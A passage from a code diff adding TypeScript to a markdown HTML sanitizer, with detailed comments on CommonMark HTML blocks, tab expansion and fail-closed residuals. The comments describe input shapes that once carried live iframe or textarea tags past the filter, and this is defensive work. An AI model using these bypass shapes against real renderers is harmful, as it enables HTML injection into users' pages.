* lines — up to `listContentCol` columns of leading whitespace, where
|
|
3060
|
+
* `listContentCol` is the width of the most recent list marker seen at the
|
|
3061
|
+
* current level.
|
|
3062
|
+
*
|
|
3063
|
+
* WHAT IT DOES NOT MODEL, and why the residual is fail-CLOSED:
|
|
3064
|
+
* - It keeps NO container stack, so it cannot tell a lazy-continuation line
|
|
3065
|
+
* from a line that genuinely left the container, and it does not verify that
|
|
3066
|
+
* a stripped prefix matches the prefix the enclosing block actually opened
|
|
3067
|
+
* with. Both errors strip TOO MUCH, i.e. detect MORE blocks, i.e. escape.
|
|
3068
|
+
* - `listContentCol` takes the literal marker width and does NOT apply
|
|
3069
|
+
* CommonMark's clamp to `markerEnd + 1` when the first block starts more than
|
|
3070
|
+
* 4 spaces after the marker. Under `-` + six spaces the real content column
|
|
3071
|
+
* is 2 and the remainder is indented code INSIDE the item; we strip 7 and may
|
|
3072
|
+
* call an indented-code line a block start. Again: more detection.
|
|
3073
|
+
* - TERMINATION strips by prefix WIDTH, not by prefix IDENTITY (see the
|
|
3074
|
+
* `blank` computation): a line carrying a different container's marker
|
|
3075
|
+
* within the opening line's prefix width and nothing after it still reads as
|
|
3076
|
+
* blank. That shape is a lone container marker at or left of the opening
|
|
3077
|
+
* content column, which under CommonMark closes the enclosing container (and
|
|
3078
|
+
* with it the HTML block) anyway — so the two agree on every shape checked.
|
|
3079
|
+
* It is the ONE bullet here whose error direction is under-detection, and it
|
|
3080
|
+
* is why the width is taken from the OPENING line rather than from a greedy
|
|
3081
|
+
* re-strip of each line.
|
|
3082
|
+
* - Offsets are NOT rewritten: `start` / `lastEnd` stay in the ORIGINAL
|
|
3083
|
+
* coordinate space (the stripped prefix is discarded, never subtracted), so
|
|
3084
|
+
* the ranges remain valid for the caller's overlap test. Line-granular
|
|
3085
|
+
* coordinates are sufficient there — `spanInsideHtmlBlock` only asks whether
|
|
3086
|
+
* a span intersects a range.
|
|
3087
|
+
*
|
|
3088
|
+
* TABS ARE EXPANDED TO 4-COLUMN STOPS FIRST (round 14). Every measurement here
|
|
3089
|
+
* is a COLUMN count, and CommonMark measures columns, so the walk cannot be fed
|
|
3090
|
+
* raw characters. Round 13 admitted the gap as a bounded residual and argued it
|
|
3091
|
+
* was fail-CLOSED; that argument was WRONG and the residual was exploitable.
|
|
3092
|
+
* `-\t-\tfoo` opens a list item whose real content column is 8 (each tab
|
|
3093
|
+
* advances to the next multiple of 4), but the character count is 4, so a
|
|
3094
|
+
* continuation line indented 8 spaces was stripped by only 4 and still looked
|
|
3095
|
+
* indented by 4 — `^ {0,3}<…` missed, `kind` stayed `null`, no range was
|
|
3096
|
+
* recorded, the balance guard never fired, and a live `<iframe>` / a swallowing
|
|
3097
|
+
* `<textarea>` reached the DOM inside a protected span (`escapeUnknownHtmlTags`
|
|
3098
|
+
* returned the input BYTE-IDENTICAL). `expandTabs` closes it: after expansion
|
|
3099
|
+
* the line contains no tabs at all, so `^ {0,3}` and every `[ \t]` class below
|
|
3100
|
+
* see true columns. Its arithmetic is the same 4-column stop rule as the mask's
|
|
3101
|
+
* `visualColumn`, so the two walks agree on what a column is.
|
|
3102
|
+
*
|
|
3103
|
+
* The blockquote half reuses `BLOCKQUOTE_PREFIX_RE` — the mask's existing
|
|
3104
|
+
* blockquote-stripping SSOT — so the two walks agree on what a quote marker is.
|
|
3105
|
+
*/
|
|
3106
|
+
const LIST_MARKER_PREFIX_RE = /^[ \t]{0,3}(?:[-*+]|\d{1,9}[.)])(?:[ \t]{1,64}|\r?$)/
|
|
3107
|
+
|
|
3108
|
+
/** Expand tabs to 4-column tab stops, so character offsets in the result ARE
|
|
3109
|
+
* columns. Same stop rule as `visualColumn` (the mask's SSOT for this). */
|
|
3110
|
+
function expandTabs(s: string): string {
|
|
3111
|
+
if (s.indexOf('\t') === -1) return s
|
|
3112
|
+
let out = ''
|
|
3113
|
+
for (const ch of s) out += ch === '\t' ? ' '.repeat(4 - (out.length % 4)) : ch
|
|
3114
|
+
return out
|
|
3115
|
+
}
|
|
3116
|
+
|
|
3117
|
+
interface NormalizedLine {
|
|
3118
|
+
/** The line with its container prefix removed (start/end conditions match this). */
|
|
3119
|
+
text: string
|
|
3120
|
+
/** Content column of a list marker this line OPENED, or -1 if it opened none. */
|
|
3121
|
+
openedListCol: number
|
|
3122
|
+
}
|
|
3123
|
+
|
|
3124
|
+
/** `rawLine` is expanded to column stops FIRST, so every length taken below is a
|
|
3125
|
+
* column count. Callers that compare against the input must compare against
|
|
3126
|
+
* `expandTabs(rawLine)`, not `rawLine` — see `computeHtmlBlockRanges`. */
|
|
3127
|
+
function stripContainerPrefix(rawLine: string, listContentCol: number): NormalizedLine {
|
|
3128
|
+
const line = expandTabs(rawLine)
|
|
3129
|
+
let rest = line
|
|
3130
|
+
let openedListCol = -1
|
|
3131
|
+
// The enclosing item's continuation indent, consumable ONCE.
|
|
3132
|
+
let indentBudget = listContentCol
|
|
3133
|
+
// Containers nest in either order (`- > <div>`, `> - <div>`), so alternate
|
|
3134
|
+
// until nothing more is consumed. Bounded so a pathological line of markers
|
|
3135
|
+
// cannot make this super-linear.
|
|
3136
|
+
for (let depth = 0; depth < 16; depth++) {
|
|
3137
|
+
const bq = BLOCKQUOTE_PREFIX_RE.exec(rest)
|
|
3138
|
+
if (bq !== null && bq[0].length > 0) {
|
|
3139
|
+
rest = rest.slice(bq[0].length)
|
|
3140
|
+
if (openedListCol >= 0) openedListCol = line.length - rest.length
|
|
3141
|
+
continue
|
|
3142
|
+
}
|
|
3143
|
+
const li = LIST_MARKER_PREFIX_RE.exec(rest)
|
|
3144
|
+
if (li !== null) {
|
|
3145
|
+
rest = rest.slice(li[0].length)
|
|
3146
|
+
openedListCol = line.length - rest.length
|
|
3147
|
+
continue
|
|
3148
|
+
}
|
|
3149
|
+
// Continuation line of the open list item: drop up to the content column of
|
|
3150
|
+
// leading whitespace (never more, and never non-whitespace) — then KEEP
|
|
3151
|
+
// PEELING. Round 13 consumed this indent after the loop and returned, so a
|
|
3152
|
+
// container opened INSIDE the item (`-\\t> <div>` continued by ` > <div>`)
|
|
3153
|
+
// kept its `>` and no start condition could match: the range was missed and
|
|
3154
|
+
// the balance guard went blind, exactly the round-13 symptom one level down.
|
|
3155
|
+
// Both markers are anchored `^ {0,3}`, so the indent MUST come off first for
|
|
3156
|
+
// either to be seen. Guarded on "this line opened no list marker", which is
|
|
3157
|
+
// what makes it a continuation line at all.
|
|
3158
|
+
if (openedListCol < 0 && indentBudget > 0) {
|
|
3159
|
+
let i = 0
|
|
3160
|
+
while (i < indentBudget && i < rest.length && rest[i] === ' ') i++
|
|
3161
|
+
indentBudget = 0
|
|
3162
|
+
if (i > 0) {
|
|
3163
|
+
rest = rest.slice(i)
|
|
3164
|
+
continue
|
|
3165
|
+
}
|
|
3166
|
+
}
|
|
3167
|
+
break
|
|
3168
|
+
}
|
|
3169
|
+
return { text: rest, openedListCol }
|
|
3170
|
+
}
|
|
3171
|
+
|
|
3172
|
+
/**
|
|
3173
|
+
* `line` MUST be the CONTAINER-NORMALIZED text (`norm.text`), not the raw line.
|
|
3174
|
+
* Kind 4's end condition is a bare `>`, which EVERY blockquote prefix contains —
|
|
3175
|
+
* fed the raw line, `> <!DOCTYPE html` self-terminated on its own start line, so
|
|
3176
|
+
* the range was never recorded and the balance guard went blind for the rest of
|
|
3177
|
+
* the block. Kinds 1/2/3/5 cannot have their closers inside a container prefix,
|
|
3178
|
+
* so for them the two are equivalent; passing `norm.text` uniformly removes the
|
|
3179
|
+
* asymmetry rather than documenting it as a fifth under-detection residual.
|
|
3180
|
+
*/
|
|
3181
|
+
function htmlBlockEnds(kind: number, line: string): boolean {
|
|
3182
|
+
switch (kind) {
|
|
3183
|
+
case 1:
|
|
3184
|
+
return HTML_BLOCK_END_1.test(line)
|
|
3185
|
+
case 2:
|
|
3186
|
+
return line.indexOf('-->') !== -1
|
|
3187
|
+
case 3:
|
|
3188
|
+
return line.indexOf('?>') !== -1
|
|
3189
|
+
case 4:
|
|
3190
|
+
return line.indexOf('>') !== -1
|
|
3191
|
+
default:
|
|
3192
|
+
return line.indexOf(']]>') !== -1
|
|
3193
|
+
}
|
|
3194
|
+
}
|
|
3195
|
+
|
|
3196
|
+
function htmlBlockStartKind(line: string, inParagraph: boolean): number | null {
|
|
3197
|
+
if (line.indexOf('<') === -1) return null
|
|
3198
|
+
if (HTML_BLOCK_START_1.test(line)) return 1
|
|
3199
|
+
if (HTML_BLOCK_START_2.test(line)) return 2
|
|
3200
|
+
if (HTML_BLOCK_START_3.test(line)) return 3
|
|
3201
|
+
if (HTML_BLOCK_START_5.test(line)) return 5
|
|
3202
|
+
if (HTML_BLOCK_START_4.test(line)) return 4
|
|
3203
|
+
const six = HTML_BLOCK_START_6.exec(line)
|
|
3204
|
+
if (six && HTML_BLOCK_TYPE_6_TAGS.has(six[2].toLowerCase())) return 6
|
|
3205
|
+
// Condition 7 is the ONLY one that cannot interrupt a paragraph.
|
|
3206
|
+
if (!inParagraph && HTML_BLOCK_START_7.test(line)) return 7
|
|
3207
|
+
return null
|
|
3208
|
+
}
|
|
3209
|
+
|
|
3210
|
+
function computeHtmlBlockRanges(text: string): HtmlBlockRange[] {
|
|
3211
|
+
if (text.indexOf('<') === -1) return []
|
|
3212
|
+
const ranges: HtmlBlockRange[] = []
|
|
3213
|
+
const fences = createFenceTracker()
|
|
3214
|
+
let kind: number | null = null
|
|
3215
|
+
let start = 0
|
|
3216
|
+
let lastEnd = 0
|
|
3217
|
+
let inParagraph = false
|
|
3218
|
+
let offset = 0
|
|
3219
|
+
// Container state for the normalization above. `listContentCol` is the width
|
|
3220
|
+
// of the innermost list marker seen; `openPrefixLen` is how many prefix
|
|
3221
|
+
// COLUMNS the CURRENTLY open block consumed on its OPENING line, which decides
|
|
3222
|
+
// whose notion of "blank line" terminates a type-6/7 block (see below).
|
|
3223
|
+
let listContentCol = 0
|
|
3224
|
+
let openPrefixLen = 0
|
|
3225
|
+
for (const line of text.split('\n')) {
|
|
3226
|
+
const lineStart = offset
|
|
3227
|
+
const lineEnd = offset + line.length
|
|
3228
|
+
offset = lineEnd + 1
|
|
3229
|
+
// Columns, not characters (see `expandTabs`). Every comparison against "the
|
|
3230
|
+
// line as written" below must use THIS, or a tab-prefixed container reads as
|
|
3231
|
+
// a container that opened nothing.
|
|
3232
|
+
const expanded = expandTabs(line)
|
|
3233
|
+
const norm = stripContainerPrefix(expanded, listContentCol)
|
|
3234
|
+
if (norm.openedListCol >= 0) listContentCol = norm.openedListCol
|
|
3235
|
+
else if (!isBlankLine(norm.text) && norm.text === expanded) listContentCol = 0
|
|
3236
|
+
const normBlank = isBlankLine(norm.text)
|
|
3237
|
+
// A type-6/7 block ends at the first blank line. At top level the raw line
|
|
3238
|
+
// decides — a bare `-` or `>` line inside a top-level HTML block is CONTENT,
|
|
3239
|
+
// and treating it as blank would END the range early (the one
|
|
3240
|
+
// under-detecting direction).
|
|
3241
|
+
//
|
|
3242
|
+
// Inside a container the container's own filler (`>`, `> >`, the item's
|
|
3243
|
+
// indent) IS that blank line, so the block must end there — but ONLY the
|
|
3244
|
+
// filler of the container the block actually opened in. Round 13 used the
|
|
3245
|
+
// fully-stripped `norm.text` here, and `stripContainerPrefix` strips ANY
|
|
3246
|
+
// container markers, not the ones that were open. So a line holding a
|
|
3247
|
+
// DIFFERENT container's opener (` >` under a `- <div>`, `> -` under a
|
|
3248
|
+
// `> <div>`) normalized to empty, read as blank, and ended the range early —
|
|
3249
|
+
// re-opening the very shelter the range exists to expose (verified: 1 live
|
|
3250
|
+
// `<textarea>`, where the same input WITHOUT the filler line rendered 0).
|
|
3251
|
+
// Under CommonMark that line is HTML content and the block continues.
|
|
3252
|
+
//
|
|
3253
|
+
// So termination strips at most the OPENING line's prefix width: ` >`
|
|
3254
|
+
// minus 2 columns is `>`, non-blank, block continues; a genuine filler (`>`
|
|
3255
|
+
// under `> `, two spaces under `- `) still normalizes to empty and still
|
|
3256
|
+
// terminates. Measured in expanded columns, consistently with `expandTabs`.
|
|
3257
|
+
// `isBlankLine`, NOT `trim()`. This is THE place the distinction bit: an
|
|
3258
|
+
// NBSP / VT / FF / BOM filler line ended a tracked type-6/7 range while
|
|
3259
|
+
// remark kept the HTML block open, so the inline-code shelter below it
|
|
3260
|
+
// stopped being "inside a tracked block", the balance guard went blind, and
|
|
3261
|
+
// a live `<textarea>` / third-party `<iframe>` reached the DOM
|
|
3262
|
+
// (`escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL). One
|
|
3263
|
+
// invisible character reopened the whole shelter class.
|
|
3264
|
+
const blank =
|
|
3265
|
+
openPrefixLen > 0 ? isBlankLine(expanded.slice(openPrefixLen)) : isBlankLine(line)
|
|
3266
|
+
if (kind !== null) {
|
|
3267
|
+
// Types 6 and 7 end at (and EXCLUDE) the first blank line; 1..5 end on
|
|
3268
|
+
// the line that satisfies their closer, INCLUSIVE.
|
|
3269
|
+
if (kind >= 6) {
|
|
3270
|
+
if (blank) {
|
|
3271
|
+
ranges.push({ start, end: lastEnd })
|
|
3272
|
+
kind = null
|
|
3273
|
+
openPrefixLen = 0
|
|
3274
|
+
inParagraph = false
|
|
3275
|
+
continue
|
|
3276
|
+
}
|
|
3277
|
+
lastEnd = lineEnd
|
|
3278
|
+
continue
|
|
3279
|
+
}
|
|
3280
|
+
lastEnd = lineEnd
|
|
3281
|
+
if (htmlBlockEnds(kind, norm.text)) {
|
|
3282
|
+
ranges.push({ start, end: lineEnd })
|
|
3283
|
+
kind = null
|
|
3284
|
+
openPrefixLen = 0
|
|
3285
|
+
inParagraph = false
|
|
3286
|
+
}
|
|
3287
|
+
continue
|
|
3288
|
+
}
|
|
3289
|
+
// Outside a block: keep fence state, so a start condition written inside a
|
|
3290
|
+
// genuine fenced code sample cannot open one. Fed the RAW line ON PURPOSE —
|
|
3291
|
+
// the tracker is a shared CommonMark machine with two other consumers and
|
|
3292
|
+
// feeding it normalized lines would let a `>`-prefixed delimiter INSIDE a
|
|
3293
|
+
// top-level fence close it early. The cost is that a fence written inside a
|
|
3294
|
+
// blockquote is invisible here, so its content lines can open a bogus block:
|
|
3295
|
+
// more detection, i.e. the fail-CLOSED direction.
|
|
3296
|
+
if (fences.push(line) !== 'text') {
|
|
3297
|
+
inParagraph = false
|
|
3298
|
+
continue
|
|
3299
|
+
}
|
|
3300
|
+
const started = htmlBlockStartKind(norm.text, inParagraph)
|
|
3301
|
+
if (started !== null) {
|
|
3302
|
+
inParagraph = false
|
|
3303
|
+
// 1..5 may satisfy their end condition on the START line itself.
|
|
3304
|
+
if (started < 6 && htmlBlockEnds(started, norm.text)) {
|
|
3305
|
+
ranges.push({ start: lineStart, end: lineEnd })
|
|
3306
|
+
continue
|
|
3307
|
+
}
|
|
3308
|
+
kind = started
|
|
3309
|
+
openPrefixLen = expanded.length - norm.text.length
|
|
3310
|
+
start = lineStart
|
|
3311
|
+
lastEnd = lineEnd
|
|
3312
|
+
continue
|
|
3313
|
+
}
|
|
3314
|
+
// Paragraph state uses the NORMALIZED blank: a container's own filler line
|
|
3315
|
+
// (`>`, `> >`) separates paragraphs inside the container. Erring toward
|
|
3316
|
+
// "not in a paragraph" only ENABLES the type-7 start condition — more
|
|
3317
|
+
// detection, the fail-CLOSED direction.
|
|
3318
|
+
inParagraph =
|
|
3319
|
+
!normBlank && leadingIndent(norm.text) < 4 && !NON_PARAGRAPH_LINE_RE.test(norm.text)
|
|
3320
|
+
}
|
|
3321
|
+
// An unterminated block runs to end of input, exactly as the tokenizer treats it.
|
|
3322
|
+
if (kind !== null) ranges.push({ start, end: lastEnd })
|
|
3323
|
+
return ranges
|
|
3324
|
+
}
|
|
3325
|
+
|
|
3326
|
+
/**
|
|
3327
|
+
* Tag-like starts the MAIN pass could not consume — `TAG_LIKE_REGEX` hard-bounds
|
|
3328
|
+
* its attribute run at 4096 chars (ReDoS hardening), so a longer run makes the
|
|
3329
|
+
* whole tag fail to match and NEITHER the allowlist NOR the RAWTEXT closer check
|
|
3330
|
+
* ever runs: a live `<iframe src="data:text/html;base64,…4KB+…">` reached the DOM
|
|
3331
|
+
* verbatim. The cap must stay (removing it reintroduces the backtracking blowup),
|
|
3332
|
+
* so instead an over-long tag FAILS CLOSED here: only its `<` is escaped, which
|
|
3333
|
+
* degrades it to visible text rather than a live opener.
|
|
3334
|
+
*
|
|
3335
|
+
* Applied ONLY to the gaps BETWEEN main-pass matches, so a tag the main pass
|
|
3336
|
+
* already decided on can never be touched twice (no `&lt;`).
|
|
3337
|
+
*
|
|
3338
|
+
* Shape is deliberately trivial — one bounded quantifier over disjoint character
|
|
3339
|
+
* classes and a single-char lookahead, so there is no alternation to backtrack
|
|
3340
|
+
* across and failure costs at most 64 steps per candidate `<`.
|
|
3341
|
+
*
|
|
3342
|
+
* MEASURED COST (round 12, this repo's vitest/jsdom env, `escapeUnknownHtmlTags`
|
|
3343
|
+
* over a document of nothing but max-length never-closed tag names — the
|
|
3344
|
+
* pathological shape for this pass): 61.2 / 122.1 / 257.2 / 492.2 ms at 325KB /
|
|
3345
|
+
* 650KB / 1.3MB / 2.6MB. Dead linear at ~190 ns/char, so there is no
|
|
3346
|
+
* algorithmic blowup — only a large constant on an input no real message has.
|
|
3347
|
+
* Realistic chat/post output (≤256KB) lands around 50ms. An earlier note in the
|
|
3348
|
+
* remediation record claimed 5.2ms for the 1.3MB case; that figure was wrong by
|
|
3349
|
+
* ~50x and is corrected here.
|
|
3350
|
+
*
|
|
3351
|
+
* NOT APPLIED INSIDE CODE (round 12). The candidate shape here is ANY
|
|
3352
|
+
* `<[a-zA-Z…]` followed by whitespace or `>`, not just the over-long tag it was
|
|
3353
|
+
* written for — so ordinary pseudo-code (` if a <b then` in an indented
|
|
3354
|
+
* block) was escaped to a visible `<`, since entity references are NOT
|
|
3355
|
+
* decoded inside code. That is the very argument that scoped the balance guard
|
|
3356
|
+
* away from inline code, applied here. The MASK already knows which regions are
|
|
3357
|
+
* code and the offsets are exact, so each candidate is checked against it
|
|
3358
|
+
* individually (per-candidate, not per-gap: a gap routinely spans both prose and
|
|
3359
|
+
* code).
|
|
3360
|
+
*
|
|
3361
|
+
* THE 4096-CHAR CAP HAS TWO CONSUMERS THAT ROUND IN OPPOSITE DIRECTIONS — and
|
|
3362
|
+
* getting that asymmetry wrong is what hid a live fail-open for six review
|
|
3363
|
+
* rounds (round 16). "This span is not KNOWN to be code" means:
|
|
3364
|
+
*
|
|
3365
|
+
* consumer | not-known-to-be-code ⇒ | fail direction
|
|
3366
|
+
* -------------------------------|------------------------|---------------
|
|
3367
|
+
* this pass (`isMaskedBlank`) | ESCAPE the `<` | CLOSED (cosmetic:
|
|
3368
|
+
* | | a visible `<`)
|
|
3369
|
+
* the CARVE (`PROTECTED_SPAN_RE`)| ESCAPE the span | CLOSED (cosmetic:
|
|
3370
|
+
* | | code renders as
|
|
3371
|
+
* | | escaped text)
|
|
3372
|
+
* the MASK's closer haystack | ADMIT a `</tag>` closer| **OPEN** (a live
|
|
3373
|
+
* (`hasLaterCloser`) | | RAWTEXT opener
|
|
3374
|
+
* | | swallows the rest
|
|
3375
|
+
* | | of the message)
|
|
3376
|
+
*
|
|
3377
|
+
* The previous version of this note analysed the over-cap span for THIS pass
|
|
3378
|
+
* only, concluded "the safe direction", and stopped — true here, false for the
|
|
3379
|
+
* haystack, where the identical cap silently un-blanked a `</textarea>` written
|
|
3380
|
+
* inside an over-long inline span and re-opened the RAWTEXT swallow this module
|
|
3381
|
+
* exists to close. A residual note must state the fail direction PER CONSUMER;
|
|
3382
|
+
* a single "safe direction" verdict for a value read by passes that round
|
|
3383
|
+
* opposite ways is not a finding, it is an averaging error.
|
|
3384
|
+
*
|
|
3385
|
+
* RESOLVED for the haystack: the mask no longer uses a capped regex at all
|
|
3386
|
+
* (`findInlineCodeRanges` — linear, uncapped), so an over-long inline span is
|
|
3387
|
+
* blanked like any other and the haystack's fail-OPEN row above no longer has
|
|
3388
|
+
* an over-cap case. Pinned by the `spanLength` axis of the swallow sweep
|
|
3389
|
+
* (cap−k and cap+k for every shelter spelling).
|
|
3390
|
+
* RESIDUAL, deliberately kept: the CARVE keeps its cap, and so does this pass's
|
|
3391
|
+
* view of an over-cap span in a document the mask ALSO declines to blank — both
|
|
3392
|
+
* of those round CLOSED per the table, i.e. they cost at worst a visible `<`.
|
|
3393
|
+
*/
|
|
3394
|
+
const LEFTOVER_TAG_START_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9-]{0,63})(?=[\s>])/g
|
|
3395
|
+
|
|
3396
|
+
function escapeLeftoverTagStarts(gap: string, lowerSource: string, gapOffset: number): string {
|
|
3397
|
+
if (gap.indexOf('<') === -1) return gap
|
|
3398
|
+
LEFTOVER_TAG_START_RE.lastIndex = 0
|
|
3399
|
+
return gap.replace(
|
|
3400
|
+
LEFTOVER_TAG_START_RE,
|
|
3401
|
+
(m: string, slash: string, tag: string, at: number) =>
|
|
3402
|
+
isMaskedBlank(lowerSource, gapOffset + at, gapOffset + at + m.length)
|
|
3403
|
+
? m
|
|
3404
|
+
: `<${slash}${tag}`,
|
|
3405
|
+
)
|
|
3406
|
+
}
|
|
3407
|
+
|
|
3408
|
+
export function escapeUnknownHtmlTags(
|
|
3409
|
+
text: string,
|
|
3410
|
+
allowedTags: Set<string> = SAFE_HTML_TAGS,
|
|
3411
|
+
): string {
|
|
3412
|
+
if (!text || text.indexOf('<') === -1) return text
|
|
3413
|
+
// Masked, length-preserving, lowercased whole-document copy for the RAWTEXT
|
|
3414
|
+
// closer lookup — the closer may live in a later segment than the opener,
|
|
3415
|
+
// so the search must span the ENTIRE source, not the segment being escaped,
|
|
3416
|
+
// and must ignore closers that are only code samples / attribute text.
|
|
3417
|
+
const lowerSource = buildCloserHaystack(text)
|
|
3418
|
+
// HTML-block ranges for the CARVE BALANCE GUARD below. Computed LAZILY: only
|
|
3419
|
+
// a protected span that actually carries an unbalanced RAWTEXT opener needs
|
|
3420
|
+
// them, which no ordinary message has.
|
|
3421
|
+
let htmlBlocks: HtmlBlockRange[] | null = null
|
|
3422
|
+
const spanInsideHtmlBlock = (from: number, to: number): boolean => {
|
|
3423
|
+
htmlBlocks ??= computeHtmlBlockRanges(text)
|
|
3424
|
+
return htmlBlocks.some((r) => r.start < to && r.end > from)
|
|
3425
|
+
}
|
|
3426
|
+
// Carve out fenced code blocks AND inline-backtick spans so `<their>`
|
|
3427
|
+
// examples inside code are preserved verbatim.
|
|
3428
|
+
const parts: string[] = []
|
|
3429
|
+
let cursor = 0
|
|
3430
|
+
PROTECTED_SPAN_RE.lastIndex = 0
|
|
3431
|
+
let span: RegExpExecArray | null
|
|
3432
|
+
while ((span = PROTECTED_SPAN_RE.exec(text)) !== null) {
|
|
3433
|
+
if (span.index > cursor) {
|
|
3434
|
+
parts.push(
|
|
3435
|
+
escapeOutsideFences(text.slice(cursor, span.index), allowedTags, lowerSource, cursor),
|
|
3436
|
+
)
|
|
3437
|
+
}
|
|
3438
|
+
// INTERSECTION GUARD (soundness, not an instance patch). A protected span
|
|
3439
|
+
// is pushed through VERBATIM, so a live RAWTEXT opener inside one never
|
|
3440
|
+
// reaches `escapeOutsideFences` at all and the mask's correctness is
|
|
3441
|
+
// bypassed. Carve and mask run different engines, so the carve CAN protect
|
|
3442
|
+
// a region the mask correctly blanked — `PROTECTED_SPAN_RE`'s closer
|
|
3443
|
+
// alternative accepts an info string, ends its span early, desyncs, and can
|
|
3444
|
+
// open a new span from a line CommonMark treats as ordinary text. Protect
|
|
3445
|
+
// only what BOTH engines call code: if the mask left anything non-blank
|
|
3446
|
+
// over this exact range, escape the span instead.
|
|
3447
|
+
//
|
|
3448
|
+
// CARVE BALANCE GUARD (the residual fail-open the intersection alone does
|
|
3449
|
+
// NOT close). The intersection only reconciles DISAGREEMENT; when BOTH
|
|
3450
|
+
// engines over-detect the SAME region it is a no-op. CommonMark says an
|
|
3451
|
+
// HTML block (type 1 `<pre>`/`<details>`, type 6 `<div>`) runs to its
|
|
3452
|
+
// terminator, so a ``` line inside one is HTML CONTENT and not a fence —
|
|
3453
|
+
// and NEITHER `createFenceTracker` nor `PROTECTED_SPAN_RE` models HTML
|
|
3454
|
+
// blocks, so both open a bogus fence at the same line and shelter whatever
|
|
3455
|
+
// follows. So the range check is paired with a self-containment check: a
|
|
3456
|
+
// protected span is by definition a complete code region, therefore any
|
|
3457
|
+
// RAWTEXT opener inside it must be BALANCED within it. An unbalanced one
|
|
3458
|
+
// means the span is not really code — route it through the escaper. This
|
|
3459
|
+
// is engine-independent (it needs no HTML-block tracking).
|
|
3460
|
+
//
|
|
3461
|
+
// GATED ON HTML-BLOCK MEMBERSHIP, NOT ON THE SPAN'S FLAVOR (round 12). The
|
|
3462
|
+
// property that makes a protected span "not really code" is that it sits
|
|
3463
|
+
// inside an HTML BLOCK — where CommonMark says every line is HTML content.
|
|
3464
|
+
// Two earlier rounds gated on flavor instead and traded one hole for the
|
|
3465
|
+
// other:
|
|
3466
|
+
// - round 9 applied the guard to BOTH alternatives. That over-applied to
|
|
3467
|
+
// inline code, where entity references are NOT recognized, so an escaped
|
|
3468
|
+
// `<title>` was shown to the reader LITERALLY — and naming a tag in
|
|
3469
|
+
// inline code (`` `<title>` ``) is the single most common way a docs
|
|
3470
|
+
// answer mentions one.
|
|
3471
|
+
// - round 11 scoped it to FENCES, justified by "an inline span cannot
|
|
3472
|
+
// shelter a live opener: remark emits it as an `inlineCode` TEXT node, so
|
|
3473
|
+
// parse5 never tokenizes its content". That invariant is asserted in a
|
|
3474
|
+
// comment and holds only OUTSIDE an HTML block. Inside one, remark emits
|
|
3475
|
+
// raw HTML, backticks are not code, and `` `<textarea>` `` on its own
|
|
3476
|
+
// line inside `<div>` / `<pre>` / `<details>` / `<span>` sheltered a live
|
|
3477
|
+
// opener that swallowed the rest of the message.
|
|
3478
|
+
// Membership covers BOTH spellings with one property, and leaves ordinary
|
|
3479
|
+
// prose inline code untouched. `isFence` is kept as an independent
|
|
3480
|
+
// sufficient condition: a fenced span that the mask blanked but the HTML
|
|
3481
|
+
// walk does not consider part of a block (the two engines can still desync)
|
|
3482
|
+
// must stay under the round-9 guarantee.
|
|
3483
|
+
// Group 1 is the fence marker, group 2 the inline backtick run.
|
|
3484
|
+
//
|
|
3485
|
+
// PROPERTY GUARANTEED: no protected span that is either a FENCE or inside an
|
|
3486
|
+
// HTML BLOCK can carry an unbalanced RAWTEXT opener into the output
|
|
3487
|
+
// verbatim. That is strictly weaker than "the carve never over-detects" — an
|
|
3488
|
+
// over-detected span with no RAWTEXT opener in it is still pushed verbatim,
|
|
3489
|
+
// which stays cosmetic-only.
|
|
3490
|
+
const isFence = span[1] !== undefined
|
|
3491
|
+
const spanEnd = span.index + span[0].length
|
|
3492
|
+
parts.push(
|
|
3493
|
+
isMaskedBlank(lowerSource, span.index, spanEnd) &&
|
|
3494
|
+
!(
|
|
3495
|
+
hasUnbalancedRawtextOpener(span[0]) &&
|
|
3496
|
+
(isFence || spanInsideHtmlBlock(span.index, spanEnd))
|
|
3497
|
+
)
|
|
3498
|
+
? span[0]
|
|
3499
|
+
: escapeOutsideFences(span[0], allowedTags, lowerSource, span.index),
|
|
3500
|
+
)
|
|
3501
|
+
cursor = span.index + span[0].length
|
|
3502
|
+
}
|
|
3503
|
+
if (cursor < text.length) {
|
|
3504
|
+
parts.push(escapeOutsideFences(text.slice(cursor), allowedTags, lowerSource, cursor))
|
|
3505
|
+
}
|
|
3506
|
+
return parts.join('')
|
|
3507
|
+
}
|
|
3508
|
+
|
|
3509
|
+
/**
|
|
3510
|
+
* Walks `segment` tag by tag rather than using `String.replace`, so the regions
|
|
3511
|
+
* the main regex did NOT consume are addressable: each gap is handed to
|
|
3512
|
+
* `escapeLeftoverTagStarts` (see it for the over-long-attribute fail-open it
|
|
3513
|
+
* closes), while every matched tag keeps its ORIGINAL index. Preserving that
|
|
3514
|
+
* index matters — `hasLaterCloser` indexes `lowerSource`, which is built from
|
|
3515
|
+
* the untouched text, so any offset drift reopens the round-5 desync class.
|
|
3516
|
+
*/
|
|
3517
|
+
function escapeOutsideFences(
|
|
3518
|
+
segment: string,
|
|
3519
|
+
allowedTags: Set<string>,
|
|
3520
|
+
lowerSource: string,
|
|
3521
|
+
segmentOffset: number,
|
|
3522
|
+
): string {
|
|
3523
|
+
const out: string[] = []
|
|
3524
|
+
let cursor = 0
|
|
3525
|
+
TAG_LIKE_REGEX.lastIndex = 0
|
|
3526
|
+
let m: RegExpExecArray | null
|
|
3527
|
+
while ((m = TAG_LIKE_REGEX.exec(segment)) !== null) {
|
|
3528
|
+
const [match, slash, tag, rest, selfClose] = m
|
|
3529
|
+
if (m.index > cursor)
|
|
3530
|
+
out.push(
|
|
3531
|
+
escapeLeftoverTagStarts(
|
|
3532
|
+
segment.slice(cursor, m.index),
|
|
3533
|
+
lowerSource,
|
|
3534
|
+
segmentOffset + cursor,
|
|
3535
|
+
),
|
|
3536
|
+
)
|
|
3537
|
+
const lower = tag.toLowerCase()
|
|
3538
|
+
const escaped = `<${slash}${tag}${rest}${selfClose}>`
|
|
3539
|
+
if (!allowedTags.has(lower)) {
|
|
3540
|
+
out.push(escaped)
|
|
3541
|
+
} else if (slash === '' && RAWTEXT_TAGS.has(lower)) {
|
|
3542
|
+
// Allowlisted — but an UNCLOSED RAWTEXT opener would swallow the rest of
|
|
3543
|
+
// the document during tokenization, before any allowlist applies.
|
|
3544
|
+
//
|
|
3545
|
+
// The SELF-CLOSED spelling counts as an opener (round 11): HTML ignores
|
|
3546
|
+
// the self-closing flag on non-void, non-foreign elements, so parse5
|
|
3547
|
+
